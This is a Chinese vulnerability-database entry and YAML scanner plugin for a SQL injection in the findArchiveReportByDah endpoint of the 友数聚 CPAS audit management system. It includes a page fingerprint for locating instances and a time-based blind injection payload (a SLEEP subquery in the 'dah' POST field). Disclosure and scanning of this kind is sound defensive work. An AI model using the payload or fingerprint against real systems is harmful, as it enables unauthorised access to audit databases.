漏洞描述
友数聚平台在/findArchiveReportByDah接口处未能正确处理传入参数导致sql注入,攻击者可以通过该漏洞获取数据库敏感信息。
detail:
ID: 10229
Author: iSee857
Name: 友数聚 findArchiveReportByDah 存在sql注入漏洞
Description: 友数聚CPAS审计管理系统V4是友数聚科技有限公司(用友集团成员企业)开发的一款审计软件产品,它是CPAS审计信息系统的一个重要组成部分。友数聚平台在/findArchiveReportByDah接口处未能正确处理传入参数导致sql注入,攻击者可以通过该漏洞获取数据库敏感信息。
Identifier:
DVB: DVB-2025-10229
VulnClass:
- SQL注入
Category:
- 应用服务
Manufacturer: 北京友数聚科技有限公司
Product: CPAS审计管理系统
Type: 1
Status: 1
Scanable: 1
Level: 3
Risk: 2
DisclosureDate: '2025-09-23'
AddDate: '2025-09-23'
UpdateDate: '2025-09-24'
Region: 中国大陆
Is0day: false
Expertmodel: false
IncludeExp: false
Weakable: false
IsXc: false
IsCommon: false
IsCallBack: false
Condition: body="/cpasm4/static/cap/font/iconfont.css"
Solutions:
- 接口参数进行预编译
PluginType: yaml
Finger:
- Manufacturer: 北京友数聚科技有限公司
Product: CPAS审计管理系统
ProductDescription: 友数聚CPAS审计管理系统V4是友数聚科技有限公司(用友集团成员企业)开发的一款审计软件产品,它是CPAS审计信息系统的一个重要组成部分。
Category: 应用服务
Type: 1
Condition: body="/cpasm4/static/cap/font/iconfont.css"
IsXc: false
Region: 中国大陆
poc:
relative: req0 && req1
session: false
requests:
- method: POST
timeout: 10
path: /cpasm4/cpasList/findArchiveReportByDah
headers:
Content-Type: application/x-www-form-urlencoded
data: dah=0' AND (SELECT 6451 FROM (SELECT(SLEEP(2)))oufm) AND 'lRBm'='lRBm
follow_redirects: false
matches: (code.eq("200") && body.contains("total") && time.egt("6"))
- method: POST
timeout: 10
path: /cpasm4/cpasList/findArchiveReportByDah
headers:
Content-Type: application/x-www-form-urlencoded
data: dah=0
follow_redirects: false
matches: (code.eq("200") && time.elt("5"))